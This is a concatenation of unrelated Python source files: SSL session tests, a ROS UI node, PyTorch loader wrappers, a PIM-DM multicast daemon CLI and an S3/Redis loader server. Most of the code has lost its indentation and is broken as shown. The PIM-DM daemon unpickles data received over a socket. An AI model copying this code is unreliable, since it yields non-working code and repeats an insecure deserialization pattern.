sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
        else:
            # for/else: runs only when the loop found no matching platform
            plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
ui.py | #!/usr/bin/env python
import json
import re
import threading
from rosgraph.masterapi import Master
import rospy
from rospy.exceptions import ROSInterruptException
from std_msgs.msg import Empty, String
from needybot.services.base import BaseServiceClient, BaseService
import needybot.lib.channels as nb_channels
from needybot.lib.logger import *
from needybot_srvs.srv import UIMessage
from rosapi.srv import Subscribers
NAMESPACE = '/ui'
SERVICES = [
('send', UIMessage)
]
class UIClient(BaseServiceClient):
def __init__(self):
super(UIClient, self).__init__(NAMESPACE, SERVICES)
class UI(BaseService):
def __init__(self):
super(UI, self).__init__(NAMESPACE)
self.did_timeout = False
self.is_connected = False
self.keep_alive_timer = None
self.register_services(SERVICES)
self.publishers = {}
self.connected_pub = rospy.Publisher(
nb_channels.Messages.ui_connected.value,
Empty,
queue_size=10,
latch=True
)
self.disconnected_pub = rospy.Publisher(
nb_channels.Messages.ui_disconnected.value,
Empty,
queue_size=10,
latch=True
)
self.connection_monitor = threading.Thread(target=self.monitor)
self.connection_monitor.start()
def monitor(self):
# Wait until subscriber on instruct message is present
notified = False
while not rospy.is_shutdown():
_, subscribers, _ = Master('/needybot').getSystemState()
if dict(subscribers).get(nb_channels.Messages.instruct.value) is not None:
                if not self.is_connected:
self.connected_pub.publish()
self.is_connected = True
else:
if self.is_connected or not notified:
notified = True
self.disconnected_pub.publish()
self.is_connected = False
rospy.sleep(0.1)
def send(self, req):
# TODO May want to wait for iPad to connect here
if not self.is_connected:
logwarn('iPad application is not yet connected.')
return False
if req.json:
            try:
                json.loads(req.json)  # validate only; the parsed value is not used
            except ValueError:
                logerr('Invalid JSON sent to UI service.')
                return False
self.send_topic(req.topic, req.json)
return True
def send_topic(self, topic, json_data):
pub = self.publishers.get(topic, None)
if not pub:
pub = rospy.Publisher(
topic,
String,
queue_size=10,
latch=True
)
self.publishers[topic] = pub
rospy.sleep(0.1)
pub.publish(json_data)
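# Illustrative sketch (not part of the original node; topic and payload are
# hypothetical): any JSON-serializable payload can be pushed to the iPad UI
# through ``send_topic``. The publisher is created lazily on first use and
# latched, so a UI that subscribes late still receives the last message.
def _demo_send_alert(ui_service):
    payload = json.dumps({'type': 'alert', 'title': 'Low battery'})
    ui_service.send_topic('/ui/alert', payload)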
if __name__ == '__main__':
try:
rospy.init_node('ui', anonymous=False)
UI()
rospy.spin()
except ROSInterruptException:
rospy.loginfo('UI is shutting down...')
|
loader.py | from typing import Any, Callable, Iterable, Union
from itertools import tee
import queue
import sys
import threading
import numpy as np
import torch
from torch.utils.data import DataLoader
class ILoaderWrapper(DataLoader):
"""Loader wrapper interface.
Args:
loader: torch dataloader.
"""
def __init__(self, loader: DataLoader):
"""Init"""
self.origin = loader
def __getattr__(self, key):
"""
Gets attribute by ``key``.
        Firstly, looks at the ``origin`` loader for the appropriate ``key``.
        If it is not found there, looks at the wrapper's own attributes.
        If nothing is found, returns ``None``.
Args:
key: attribute key
Returns:
attribute value
"""
some_default_value = "_no_attr_found_"
value = self.origin.__dict__.get(key, some_default_value)
# value = getattr(self.origin, key, None)
if value != some_default_value:
return value
value = self.__dict__.get(key, some_default_value)
# value = getattr(self, key, None)
if value != some_default_value:
return value
return None
def __len__(self) -> int:
"""Returns length of the wrapper loader.
Returns:
int: length of the wrapper loader
"""
return len(self.origin)
class BatchLimitLoaderWrapper(ILoaderWrapper):
"""Loader wrapper. Limits number of batches used per each iteration.
    For example, if you have some loader and want to use only the first 5 batches:
.. code-block:: python
import torch
from torch.utils.data import DataLoader, TensorDataset
from catalyst.data.loader import BatchLimitLoaderWrapper
num_samples, num_features = int(1e4), int(1e1)
X, y = torch.rand(num_samples, num_features), torch.rand(num_samples)
dataset = TensorDataset(X, y)
loader = DataLoader(dataset, batch_size=32, num_workers=1)
loader = BatchLimitLoaderWrapper(loader, num_batches=5)
or if you would like to use only some portion of Dataloader
(we use 30% in the example below):
.. code-block:: python
import torch
from torch.utils.data import DataLoader, TensorDataset
from catalyst.data.loader import BatchLimitLoaderWrapper
num_samples, num_features = int(1e4), int(1e1)
X, y = torch.rand(num_samples, num_features), torch.rand(num_samples)
dataset = TensorDataset(X, y)
loader = DataLoader(dataset, batch_size=32, num_workers=1)
loader = BatchLimitLoaderWrapper(loader, num_batches=0.3)
.. note::
Generally speaking, this wrapper could be used with any iterator-like
object. No ``DataLoader``-specific code used.
"""
def __init__(self, loader: DataLoader, num_batches: Union[int, float]):
"""Loader wrapper. Limits number of batches used per each iteration.
Args:
loader: torch dataloader.
num_batches (Union[int, float]): number of batches to use (int),
or portion of iterator (float, should be in [0;1] range)
"""
super().__init__(loader)
assert isinstance(num_batches, (int, float)), (
"Expected ``num_batches`` type is int/float" f"but got {type(num_batches)}"
)
if isinstance(num_batches, float):
assert 0.0 <= num_batches <= 1, (
"Expected ``num_batches`` to be in range [0; 1]" f"but got {num_batches}"
)
num_batches = int(len(loader) * num_batches)
self._iterator = iter(self.origin)
self.iteration_index = 0
self.num_batches = num_batches
def __iter__(self):
"""Iterator.
Returns:
iterator object
"""
self.iteration_index = 0
self._iterator, self.iterator = tee(self._iterator)
return self
def __next__(self):
"""Next batch.
Returns:
next batch
Raises:
StopIteration: if iteration_index >= len(origin)
"""
if self.iteration_index >= len(self.origin):
raise StopIteration()
self.iteration_index += 1
if self.iteration_index % self.num_batches == 0:
self._iterator, self.iterator = tee(self._iterator)
batch = next(self.iterator)
return batch
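# Tiny self-contained sketch (added for illustration; not part of the library):
# per the note in the class docstring, the wrapper only needs an iterable that
# also supports ``len()``, so a plain list of "batches" suffices to observe
# that nothing beyond the first ``num_batches`` items is ever drawn.
def _demo_batch_limit():
    fake_batches = list(range(10))  # pretend each int is a batch
    limited = BatchLimitLoaderWrapper(fake_batches, num_batches=3)
    seen = {batch for batch in limited}  # one full pass over the wrapper
    assert seen <= {0, 1, 2}, seen  # only the first 3 batches ever appear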
def _any2cuda_non_blocking(value: Any):
# based on catalyst.utils.torch.any2device
# but with cuda non_blocking trick
if isinstance(value, dict):
return {k: _any2cuda_non_blocking(v) for k, v in value.items()}
elif isinstance(value, (tuple, list)):
return [_any2cuda_non_blocking(v) for v in value]
elif torch.is_tensor(value):
return value.cuda(non_blocking=True)
elif isinstance(value, (np.ndarray, np.void)) and value.dtype.fields is not None:
return {k: _any2cuda_non_blocking(value[k]) for k in value.dtype.fields.keys()}
    elif isinstance(value, np.ndarray):
        return torch.tensor(value).cuda(non_blocking=True)
    # any other type falls through this chain and is returned as ``None``
def _map_loop(
func: Callable,
iterable: Iterable,
result_queue: queue.Queue,
error_queue: queue.Queue,
done_event: threading.Event,
):
try:
for x in iterable:
result = func(x)
result_queue.put(result)
except BaseException:
error_queue.put(sys.exc_info())
finally:
done_event.set()
def _prefetch_map(
func: Callable, iterable: Iterable, num_prefetches: int = 1, timeout: int = 2
) -> Iterable:
result_queue = queue.Queue(num_prefetches)
error_queue = queue.Queue(1)
done_event = threading.Event()
map_thread = threading.Thread(
target=_map_loop, args=(func, iterable, result_queue, error_queue, done_event)
)
map_thread.daemon = True
map_thread.start()
while not (done_event.is_set() and result_queue.empty()):
try:
result = result_queue.get(timeout=timeout)
except queue.Empty:
continue
yield result
if error_queue.full():
raise error_queue.get()[1]
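# Illustrative usage of ``_prefetch_map`` (added for clarity; not part of the
# library): a slow per-item transform runs on the background thread while the
# consumer drains already-finished results from the bounded queue.
def _demo_prefetch_map():
    import time

    def slow_double(x):
        time.sleep(0.01)  # stand-in for an expensive host-to-device copy
        return 2 * x

    return list(_prefetch_map(slow_double, range(5), num_prefetches=2))  # [0, 2, 4, 6, 8]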
def _prefetch_loader(loader: DataLoader, num_prefetches: int) -> Iterable:
if torch.cuda.is_available():
return _prefetch_map(
_any2cuda_non_blocking, loader, num_prefetches=num_prefetches
)
else:
return iter(loader)
class BatchPrefetchLoaderWrapper(ILoaderWrapper):
"""Loader wrapper. Prefetches specified number of batches on the GPU.
Base usage:
.. code-block:: python
import torch
from torch.utils.data import DataLoader, TensorDataset
from catalyst.data import BatchPrefetchLoaderWrapper
num_samples, num_features = int(1e4), int(1e1)
X, y = torch.rand(num_samples, num_features), torch.rand(num_samples)
dataset = TensorDataset(X, y)
loader = DataLoader(dataset, batch_size=32, num_workers=1)
loader = BatchPrefetchLoaderWrapper(loader)
Minimal working example:
.. code-block:: python
import os
import torch
from torch.nn import functional as F
from torch.utils.data import DataLoader
from catalyst import dl, metrics
from catalyst.data.cv import ToTensor
from catalyst.contrib.datasets import MNIST
from catalyst.data import BatchPrefetchLoaderWrapper
class CustomRunner(dl.Runner):
def handle_batch(self, batch):
# model train/valid step
x, y = batch
y_hat = self.model(x.view(x.size(0), -1))
loss = F.cross_entropy(y_hat, y)
accuracy01 = metrics.accuracy(y_hat, y, topk=(1, ))
self.batch_metrics.update(
{"loss": loss, "accuracy01": accuracy01}
)
if self.is_train_loader:
self.engine.backward(loss)
self.optimizer.step()
self.optimizer.zero_grad()
model = torch.nn.Linear(28 * 28, 10)
optimizer = torch.optim.Adam(model.parameters(), lr=0.02)
batch_size=32
loaders = {
"train": DataLoader(
MNIST(
os.getcwd(),
train=True,
download=True,
transform=ToTensor()
),
batch_size=batch_size),
"valid": DataLoader(
MNIST(
os.getcwd(),
train=False,
download=True,
transform=ToTensor()
),
batch_size=batch_size),
}
loaders = {
k: BatchPrefetchLoaderWrapper(v) for k, v in loaders.items()
}
runner = CustomRunner()
# model training
runner.train(
model=model,
optimizer=optimizer,
loaders=loaders,
logdir="./logs",
num_epochs=5,
verbose=True,
load_best_on_end=True,
)
"""
def __init__(self, loader: DataLoader, num_prefetches: int = None):
"""Loader wrapper. Prefetches specified number of batches on the GPU.
Args:
loader: torch dataloader.
num_prefetches: number of batches to prefetch on the GPU.
"""
super().__init__(loader)
self.num_prefetches = num_prefetches or 1
def __iter__(self):
"""Iterator.
Returns:
iterator object
"""
return _prefetch_loader(self.origin, self.num_prefetches)
__all__ = ["ILoaderWrapper", "BatchLimitLoaderWrapper", "BatchPrefetchLoaderWrapper"]
|
Run.py | #!/usr/bin/env python3
import os
import sys
import time
import glob
import socket
import argparse
import threading
import traceback
import _pickle as pickle
from prettytable import PrettyTable
from pimdm import Main
from pimdm.tree import pim_globals
from pimdm.daemon.Daemon import Daemon
VERSION = "1.3.1"
def client_socket(data_to_send, print_output=True):
# Create a UDS socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = pim_globals.DAEMON_SOCKET.format(pim_globals.MULTICAST_TABLE_ID)
#print('connecting to %s' % server_address)
try:
sock.connect(server_address)
sock.sendall(pickle.dumps(data_to_send))
data_rcv = sock.recv(1024 * 256)
if data_rcv:
if print_output:
print(pickle.loads(data_rcv))
else:
return pickle.loads(data_rcv)
except socket.error:
pass
finally:
#print('closing socket')
sock.close()
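# Illustrative only (not part of the original CLI): any picklable
# argparse.Namespace can be shipped to a running daemon over the Unix socket,
# for example to ask it for its enabled IPv4 interfaces:
#
#   ns = argparse.Namespace(list_interfaces=True, ipv4=True, ipv6=False)
#   client_socket(ns)  # prints the daemon's unpickled reply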
class MyDaemon(Daemon):
def run(self):
Main.main()
server_address = pim_globals.DAEMON_SOCKET.format(pim_globals.MULTICAST_TABLE_ID)
# Make sure the socket does not already exist
try:
os.unlink(server_address)
except OSError:
if os.path.exists(server_address):
raise
# Create a UDS socket
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Bind the socket to the port
sock.bind(server_address)
# Listen for incoming connections
sock.listen(1)
while True:
try:
connection, client_address = sock.accept()
data = connection.recv(256 * 1024)
                print('sending data back to the client', file=sys.stderr)
print(pickle.loads(data))
args = pickle.loads(data)
                if ('ipv4' not in args and 'ipv6' not in args) or not (args.ipv4 or args.ipv6):
args.ipv4 = True
args.ipv6 = False
if 'list_interfaces' in args and args.list_interfaces:
connection.sendall(pickle.dumps(Main.list_enabled_interfaces(ipv4=args.ipv4, ipv6=args.ipv6)))
elif 'list_neighbors' in args and args.list_neighbors:
connection.sendall(pickle.dumps(Main.list_neighbors(ipv4=args.ipv4, ipv6=args.ipv6)))
elif 'list_state' in args and args.list_state:
connection.sendall(pickle.dumps(Main.list_state(ipv4=args.ipv4, ipv6=args.ipv6)))
elif 'add_interface' in args and args.add_interface:
Main.add_pim_interface(args.add_interface[0], False, ipv4=args.ipv4, ipv6=args.ipv6)
connection.shutdown(socket.SHUT_RDWR)
elif 'add_interface_sr' in args and args.add_interface_sr:
Main.add_pim_interface(args.add_interface_sr[0], True, ipv4=args.ipv4, ipv6=args.ipv6)
connection.shutdown(socket.SHUT_RDWR)
elif 'add_interface_igmp' in args and args.add_interface_igmp:
Main.add_membership_interface(interface_name=args.add_interface_igmp[0], ipv4=True, ipv6=False)
connection.shutdown(socket.SHUT_RDWR)
elif 'add_interface_mld' in args and args.add_interface_mld:
Main.add_membership_interface(interface_name=args.add_interface_mld[0], ipv4=False, ipv6=True)
connection.shutdown(socket.SHUT_RDWR)
elif 'remove_interface' in args and args.remove_interface:
Main.remove_interface(args.remove_interface[0], pim=True, ipv4=args.ipv4, ipv6=args.ipv6)
connection.shutdown(socket.SHUT_RDWR)
elif 'remove_interface_igmp' in args and args.remove_interface_igmp:
Main.remove_interface(args.remove_interface_igmp[0], membership=True, ipv4=True, ipv6=False)
connection.shutdown(socket.SHUT_RDWR)
elif 'remove_interface_mld' in args and args.remove_interface_mld:
Main.remove_interface(args.remove_interface_mld[0], membership=True, ipv4=False, ipv6=True)
connection.shutdown(socket.SHUT_RDWR)
elif 'list_instances' in args and args.list_instances:
connection.sendall(pickle.dumps(Main.list_instances()))
elif 'stop' in args and args.stop:
Main.stop()
connection.shutdown(socket.SHUT_RDWR)
break
elif 'test' in args and args.test:
Main.test(args.test[0], args.test[1])
connection.shutdown(socket.SHUT_RDWR)
elif 'config' in args and args.config:
Main.set_config(args.config[0])
connection.shutdown(socket.SHUT_RDWR)
elif 'get_config' in args and args.get_config:
connection.sendall(pickle.dumps(Main.get_config()))
elif 'drop' in args and args.drop:
Main.drop(args.drop[0], int(args.drop[1]))
except Exception:
connection.shutdown(socket.SHUT_RDWR)
traceback.print_exc()
finally:
# Clean up the connection
connection.close()
sock.close()
def main():
"""
Entry point for PIM-DM
"""
parser = argparse.ArgumentParser(description='PIM-DM protocol', prog='pim-dm')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-start", "--start", action="store_true", default=False, help="Start PIM")
group.add_argument("-stop", "--stop", action="store_true", default=False, help="Stop PIM")
group.add_argument("-restart", "--restart", action="store_true", default=False, help="Restart PIM")
group.add_argument("-li", "--list_interfaces", action="store_true", default=False, help="List All PIM Interfaces. "
"Use -4 or -6 to specify IPv4 or IPv6 interfaces.")
group.add_argument("-ln", "--list_neighbors", action="store_true", default=False, help="List All PIM Neighbors. "
"Use -4 or -6 to specify IPv4 or IPv6 PIM neighbors.")
group.add_argument("-ls", "--list_state", action="store_true", default=False, help="List IGMP/MLD and PIM-DM state machines."
" Use -4 or -6 to specify IPv4 or IPv6 state respectively.")
group.add_argument("-instances", "--list_instances", action="store_true", default=False,
help="List running PIM-DM daemon processes.")
group.add_argument("-mr", "--multicast_routes", action="store_true", default=False, help="List Multicast Routing table. "
"Use -4 or -6 to specify IPv4 or IPv6 multicast routing table.")
group.add_argument("-ai", "--add_interface", nargs=1, metavar='INTERFACE_NAME', help="Add PIM interface. "
"Use -4 or -6 to specify IPv4 or IPv6 interface.")
group.add_argument("-aisr", "--add_interface_sr", nargs=1, metavar='INTERFACE_NAME', help="Add PIM interface with State Refresh enabled. "
"Use -4 or -6 to specify IPv4 or IPv6 interface.")
group.add_argument("-aiigmp", "--add_interface_igmp", nargs=1, metavar='INTERFACE_NAME', help="Add IGMP interface")
group.add_argument("-aimld", "--add_interface_mld", nargs=1, metavar='INTERFACE_NAME', help="Add MLD interface")
group.add_argument("-ri", "--remove_interface", nargs=1, metavar='INTERFACE_NAME', help="Remove PIM interface. "
"Use -4 or -6 to specify IPv4 or IPv6 interface.")
group.add_argument("-riigmp", "--remove_interface_igmp", nargs=1, metavar='INTERFACE_NAME', help="Remove IGMP interface")
group.add_argument("-rimld", "--remove_interface_mld", nargs=1, metavar='INTERFACE_NAME', help="Remove MLD interface")
group.add_argument("-v", "--verbose", action="store_true", default=False, help="Verbose (print all debug messages)")
group.add_argument("-t", "--test", nargs=2, metavar=('ROUTER_NAME', 'SERVER_LOG_IP'), help="Tester... send log information to SERVER_LOG_IP. Set the router name to ROUTER_NAME")
group.add_argument("-config", "--config", nargs=1, metavar='CONFIG_FILE_PATH', type=str,
help="File path for configuration file.")
group.add_argument("-get_config", "--get_config", action="store_true", default=False,
help="Get configuration file of live daemon.")
#group.add_argument("-drop", "--drop", nargs=2, metavar=('INTERFACE_NAME', 'PACKET_TYPE'), type=str)
group.add_argument("--version", action='version', version='%(prog)s ' + VERSION)
group_ipversion = parser.add_mutually_exclusive_group(required=False)
group_ipversion.add_argument("-4", "--ipv4", action="store_true", default=False, help="Setting for IPv4")
group_ipversion.add_argument("-6", "--ipv6", action="store_true", default=False, help="Setting for IPv6")
group_vrf = parser.add_argument_group()
group_vrf.add_argument("-mvrf", "--multicast_vrf", nargs=1, default=[pim_globals.MULTICAST_TABLE_ID],
metavar='MULTICAST_VRF_NUMBER', type=int,
help="Define multicast table id. This can be used on -start to explicitly start the daemon"
" process on a given vrf. It can also be used with the other commands "
"(for example add, list, ...) for setting/getting information on a given daemon"
" process")
group_vrf.add_argument("-uvrf", "--unicast_vrf", nargs=1, default=[pim_globals.UNICAST_TABLE_ID],
metavar='UNICAST_VRF_NUMBER', type=int,
help="Define unicast table id for getting unicast information (RPF checks, RPC costs, ...). "
"This information can only be defined at startup with -start command")
args = parser.parse_args()
#print(parser.parse_args())
# This script must be run as root!
if os.geteuid() != 0:
sys.exit('PIM-DM must be run as root!')
if args.list_instances:
pid_files = glob.glob("/tmp/Daemon-pim*.pid")
t = PrettyTable(['Instance PID', 'Multicast VRF', 'Unicast VRF'])
for pid_file in pid_files:
d = MyDaemon(pid_file)
            pim_globals.MULTICAST_TABLE_ID = pid_file[15:-4]  # strip '/tmp/Daemon-pim' prefix and '.pid' suffix
if not d.is_running():
continue
t_new = client_socket(args, print_output=False)
t.add_row(t_new.split("|"))
print(t)
return
pim_globals.MULTICAST_TABLE_ID = args.multicast_vrf[0]
pim_globals.UNICAST_TABLE_ID = args.unicast_vrf[0]
daemon = MyDaemon(pim_globals.DAEMON_PROCESS_FILE.format(pim_globals.MULTICAST_TABLE_ID))
if args.start:
print("start")
daemon.start()
sys.exit(0)
elif args.stop:
client_socket(args)
daemon.stop()
sys.exit(0)
elif args.restart:
daemon.restart()
sys.exit(0)
elif args.config:
try:
from pimdm import Config
args.config[0] = os.path.abspath(args.config[0])
[pim_globals.MULTICAST_TABLE_ID, pim_globals.UNICAST_TABLE_ID] = Config.get_vrfs(args.config[0])
daemon = MyDaemon(pim_globals.DAEMON_PROCESS_FILE.format(pim_globals.MULTICAST_TABLE_ID))
if not daemon.is_running():
x = threading.Thread(target=daemon.start, args=())
x.start()
x.join()
while not daemon.is_running():
time.sleep(1)
except ModuleNotFoundError:
print("PYYAML needs to be installed. Execute \"pip3 install pyyaml\"")
sys.exit(0)
except ImportError:
print("PYYAML needs to be installed. Execute \"pip3 install pyyaml\"")
sys.exit(0)
elif args.verbose:
os.system("tail -f {}".format(pim_globals.DAEMON_LOG_STDOUT_FILE.format(pim_globals.MULTICAST_TABLE_ID)))
sys.exit(0)
elif args.multicast_routes:
if args.ipv4 or not args.ipv6:
os.system("ip mroute show table " + str(pim_globals.MULTICAST_TABLE_ID))
elif args.ipv6:
os.system("ip -6 mroute show table " + str(pim_globals.MULTICAST_TABLE_ID))
sys.exit(0)
elif not daemon.is_running():
print("PIM-DM is not running")
parser.print_usage()
sys.exit(0)
client_socket(args)
if __name__ == "__main__":
main()
|
simple_tokenize.py | # Converts C/C++ files flatly into their tokens
import tokenizer.main as tokenizer
import helpers.common as common
import helpers.io as io
from multiprocessing import Process
def doAssignment(students, assign, helpers):
helpers.printf("tokenizing '{}' in parellel...\n".format(assign.name))
# for each student
for student in students:
        # for each specified file
files = assign.args["files"]
for filename in files:
path = helpers.getAssignmentPath(student, assign.name, filename)
            if path is not None:
# tokenize the file
result = tokenizer.simple(path)
# write the result
safeFilename = common.makeFilenameSafe(filename) + "tokenized.txt"
helpers.writeToPreprocessed(result, student, assign.name, safeFilename)
# all done!
helpers.printf("Finished '{}'!\n".format(assign.name))
def run(students, assignments, args, helpers):
# threads to join
threads = []
# for each assignment
for assign in assignments:
t = Process(target=doAssignment, args=(students, assign, helpers))
threads.append(t)
t.start()
    # join them
for t in threads:
t.join()
# all done here
return True |
server.py | import uvicorn
from fastapi import FastAPI
from pydantic import BaseModel
import os
import logging
import json
import time
from threading import Thread
from multiprocessing import Process, Pool
from functools import partial
import boto3
import botocore
import sys
import cache
class LoadMessage(BaseModel):
file_type: str
file_path: str
file_name: list = []
class LoadRequest(BaseModel):
message: LoadMessage = None
app = FastAPI()
# Mandatory variables in environment
MANDATORY_ENV_VARS = {
'LOCAL_DATA_FOLDER': '/tmp/rs-data/',
'S3_BUCKET_DATA': 'aws-gcr-rs-sol-demo-ap-southeast-1-522244679887',
"RECORDS_PATH": 'news-open/system/item-data/meta-data/',
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'LOADER_PORT': 5000
}
item_records = 'item_records_dict'
action_model = 'model.tar.gz'
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
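# Minimal sketch (illustrative; not part of the original service) of the
# fire-and-forget semantics of ``xasync``: the decorated call returns
# immediately, the body runs on its own thread, and any return value of the
# body is discarded.
@xasync
def _demo_background_task(label):
    time.sleep(1)  # pretend this is slow I/O
    logging.info('finished background task %s', label)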
@app.get('/loader/status', tags=["monitoring"])
def status():
logging.info('Collecting status information from server & plugin...')
return {
'env': MANDATORY_ENV_VARS,
'redis': rCache.connection_status()
}
@app.get('/ping', tags=["monitoring"])
def ping():
logging.info('Processing default request...')
return {'result': 'ping'}
@app.post('/loader/notice', tags=["loader-service"])
def notice(loadRequest: LoadRequest):
logging.info('Start loader->process()...')
loader_message = loadRequest.message
file_type = loader_message.file_type
file_path = loader_message.file_path
file_list = loader_message.file_name
logging.info('file type:{}, file_path:{}, file_list:{}'.format(
file_type, file_path, file_list))
if not os.path.exists(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']):
logging.info("the local path {} is not existed".format(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']))
os.mkdir(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
if file_type == 'inverted-list':
for file in file_list:
init_single_pickle_data(file_path, file)
else:
for file in file_list:
if file_type == 'action-model':
init_data_file(file_path, file)
elif file_type == 'vector-index':
init_data_file(file_path, file)
elif file_type == 'embedding':
init_data_file(file_path, file)
elif file_type == 'feature_model':
init_data_file(file_path, file)
time.sleep(10)
notice_service_to_reload(
file_type, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'], file_list)
return json.dumps({'result': 'success'}), 200, {'ContentType': 'application/json'}
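# Illustrative client call for the endpoint above (bucket layout and file
# names are hypothetical placeholders):
#
#   import requests  # hypothetical client-side dependency
#   requests.post('http://localhost:5000/loader/notice', json={
#       'message': {'file_type': 'embedding',
#                   'file_path': 'news-open/model/',
#                   'file_name': ['embed.npy']}})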
def init_single_pickle_data(path, file):
download_file_from_s3(MANDATORY_ENV_VARS['S3_BUCKET_DATA'], path, file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
def init_data_file(path, file):
download_file_from_s3(MANDATORY_ENV_VARS['S3_BUCKET_DATA'], path, file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
def download_file_from_s3(bucket, path, file, dest_folder):
logging.info('Download file - %s from s3://%s/%s ... ', file, bucket, path)
# Using default session
s3client = boto3.client('s3')
try:
s3client.download_file(bucket, path+file, dest_folder+file)
except botocore.exceptions.ClientError as error:
raise error
except botocore.exceptions.ParamValidationError as error:
raise ValueError(
'The parameters you provided are incorrect: {}'.format(error))
logging.info(
'Download file - %s from s3://%s/%s ... was success', file, bucket, path)
return dest_folder+file
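# For example, assuming the default bucket and prefix above, a call like
#   download_file_from_s3(MANDATORY_ENV_VARS['S3_BUCKET_DATA'],
#                         MANDATORY_ENV_VARS['RECORDS_PATH'],
#                         item_records,
#                         MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
# would fetch s3://<bucket>/news-open/system/item-data/meta-data/item_records_dict
# into /tmp/rs-data/item_records_dict.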
def notice_service_to_reload(file_type, file_path, file_list):
logging.info('file_type=%s, file_path=%s, file_list=%s',
file_type, file_path, file_list)
data = {
'file_type': file_type,
'file_path': file_path,
'file_list': str(file_list)
}
rCache.load_data_into_stream(file_type, data)
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.warning(
"Mandatory variable %s is not set, using default value %s.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var] = os.environ.get(var)
# Initial redis connection
global rCache
rCache = cache.RedisCache(
host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
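# Any of the defaults above can be overridden via the environment before
# startup, e.g. (illustrative values): REDIS_HOST=redis.internal LOADER_PORT=8080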
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
uvicorn.run(app, host="0.0.0.0", port=MANDATORY_ENV_VARS['LOADER_PORT'])
|
host_callback_test.py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
